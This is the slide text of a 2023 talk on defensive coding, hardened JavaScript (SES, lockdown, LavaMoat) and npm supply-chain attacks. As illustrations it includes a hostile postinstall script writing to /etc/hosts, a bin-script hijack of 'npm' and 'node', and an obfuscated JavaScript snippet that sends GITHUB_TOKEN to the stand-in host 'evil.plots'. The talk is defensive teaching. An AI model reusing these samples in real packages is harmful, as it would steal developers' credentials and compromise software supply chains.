Defensive Coding
and Hardened JavaScript
@naugtur 2023
Wouldn't it be great to fearlessly use them like we did back in 2015?
Someone else's code
var code = `trustMe("I'm an engineer")`
What if a package turns malicious?
exfiltration
fetch, process.env
prototype pollution
RCE
fs
event-stream
### JS can be tweaked and it's no accident
- designed in 10 days
- humbly assuming there's room for improvement
## polyfills
#### and
## prototype poisoning
#### are the same thing
#### with different intentions
## Defensive Coding exercise time!
### π¦ repo:
[js-training-examples -> defensive coding](https://github.com/naugtur/js-training-examples)
### Should we reinvent
### the wheel?
[ses/src/commons.js](https://github.com/endojs/endo/blob/master/packages/ses/src/commons.js)
# SES ?
### What is that?
# π€―
### JS design is good for security?
- Take ECMA + W3C
- Add Conway's Law
- Separation between language and APIs
- Power only reachable through scope
- Compartment controls scope
process
window
Lambda function
ClFl worker
iframe
thread
process
process
process
ClFl worker
iframe
thread
process
process
process
### SES
- `Compartment` - scope isolation
- `lockdown` - makes your Realm secure
- `harden` - protects capable objects
#### Let's see how `lockdown()` works to prevent prototype pollution
## demo
## Story time
Let's install some dependencies!
Ok, catch this: π¦
I'm gonna sneak it in as
a dev dependency of yours
That's what you think.
"postinstall": "echo π© > /etc/hosts"
### Ok, wait
```
β¨π
npm ci
cp node_modules s3://
π₯π₯ππ₯π₯
```
#### Using typescript maybe?
### Hold my πΊ
## ignore scripts
```
npm ci --ignore-scripts
```
Run selected scritps
```
npm rebuild bcrypt
```
#### look what I found!
I see you use scripts
evilpackage/package.json:
"bin": {
"npm": "./evilPlots.js",
"node": "./evilPlots.js"
credit: https://socket.dev/blog/npm-bin-script-confusion
# π€―
but
but npm said it was a feature! π
#### let's get serious
> Dear ${ eslintPluginMaintainer },
> I understand you're busy and I'd be happy to help with maintenance of your
tiny but popular plugin...
#### ok, just in case you do
```
const _0x765e5=_0x46a0;(function(_0x57764e,_0x91aa41){const
_0x32405d=_0x46a0,_0x165444=_0x57764e();while(!![]){try{const
_0x42ba82=-parseInt(_0x32405d(0x150))/0x1*(parseInt(_0x32405d(0x15e))/0x2)+-parseInt(_0x32405d(0x153))/0x3*(-parseInt(_0x32405d(0x14f))/0x4)+parseInt(_0x32405d(0x159))/0x5*(-parseInt(_0x32405d(0x158))/0x6)+parseInt(_0x32405d(0x151))/0x7*(-parseInt(_0x32405d(0x152))/0x8)+parseInt(_0x32405d(0x157))/0x9+-parseInt(_0x32405d(0x15f))/0xa+parseInt(_0x32405d(0x15a))/0xb;
if(_0x42ba82===_0x91aa41)break;else
_0x165444['push'](_0x165444['shift']());}catch(_0x54f92f){_0x165444['push'](_0x165444['shift']());}}}(_0x3641,0x8e73e));function
_0x3641()
{const _0x5d9864=['/stolen/','evil.plots','2511378rgvTaf','5826vwOBSz','3845SrYtZx',
'37351105uFQfso','request','end','https','72326kmzepu','8558100KDxwfw',
'GITHUB_TOKEN','25432JwBMWs','29XqXcpt','4547823ytmFVF','8EFXBHJ','99iKrczU','env'];
_0x3641=function(){return _0x5d9864;};return _0x3641();}function _0x46a0(_0x24c0cb,_0x27294c){const
_0x3641a1=_0x3641();return _0x46a0=function(_0x46a08f,_0x225127){_0x46a08f=_0x46a08f-0x14f;let
_0x16a89a=_0x3641a1[_0x46a08f];return _0x16a89a;},
_0x46a0(_0x24c0cb,_0x27294c);}const
credentials=process[_0x765e5(0x154)][_0x765e5(0x160)],req=require(_0x765e5(0x15d))[_0x765e5(0x15b)]({'hostname':_0x765e5(0x156),'path':_0x765e5(0x155)+credentials},()=>{});req[_0x765e5(0x15c)]();
```
#### should I keep going?
#### yo, there's an app for that!
# (β―Β°β‘Β°)β―οΈ΅ β»ββ»
Now let's set up LavaMoat in a project
### Want more?
[Mark Miller on F5 Tech Talks](https://www.youtube.com/watch?v=u-XETUbxNUU)
Here's how it compares:
```txt
Mark's talk: "Here's how we discovered cocoa trees and how
we now produce delicious chocolate in a beautiful process
with incredible machines!"
```
```txt
Zb's talk: "It basically grows on trees!"
>>throws handfuls of candy at the audience
```
